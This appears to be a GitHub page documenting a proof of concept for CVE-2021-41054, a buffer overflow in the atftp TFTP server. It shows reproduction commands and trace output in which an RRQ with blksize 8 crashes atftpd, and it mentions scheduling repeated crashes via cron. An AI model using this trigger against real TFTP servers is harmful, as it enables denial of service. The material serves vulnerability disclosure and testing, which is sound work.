Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-mitre/CVE-2021-41054/
CVE-mitre/CVE-2021-41054/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 

CVE-2021-41054

Description:

tftpd_file.c in atftp through 0.7.4 has a buffer overflow because buffer-size handling does not properly consider the combination of data, OACK, and other options. A malicious user in network layer 2 can execute a malicious file to bring down the server, every time when this will be possible! Or he can create a malicious cron job to do this, every time when the cron will execute it.

Idea -by:

  • Martin Dummer

Author of the PoC-client and TestServ.sh automation

  • @nu11secur1ty

Reproduce:

  • Run TestServ.sh
bash TestServ.sh
  • Output:
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]: Advanced Trivial FTP server started (0.7)
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   running in daemon mode on port 2000
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   logging level: 7
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:      trace enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   directory: tmp/
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   user: root.root
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   log file: /dev/stdout
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   not forcing to listen on local interfaces.
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   server timeout: Not used
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   tftp retry timeout: 5
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   maximum number of thread: 100
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option timeout:   enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option tzise:     enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option blksize:   enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option multicast: enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:      address range: 239.255.0.0-255
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:      port range:    1758
  • Run PoC-client.sh
bash PoC-client.sh
  • Output:
Trace mode on.
Option blksize = 8
Option timeout = 3
sent RRQ <file: tmp/nu11secur1ty.txt, mode: octet <timeout: 3, blksize: 8>>
timeout: retrying...

Test Output:

  • (core dumped) /usr/sbin/atftpd
Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: timeout option -> 3
Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: blksize option -> 8
Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: sent OACK <timeout: 3, blksize: 8>
TestServ.sh: line 8:  3276 Segmentation fault      (core dumped) /usr/sbin/atftpd --user=$(id -un) --group=$(id -gn) --daemon --no-fork --trace --logfile=/dev/stdout --verbose=7 --port 2000 tmp
Trace mode on.
Option blksize = 8
Usage: connect host-name [port]
Not connected.

Proof:

href

Source:

href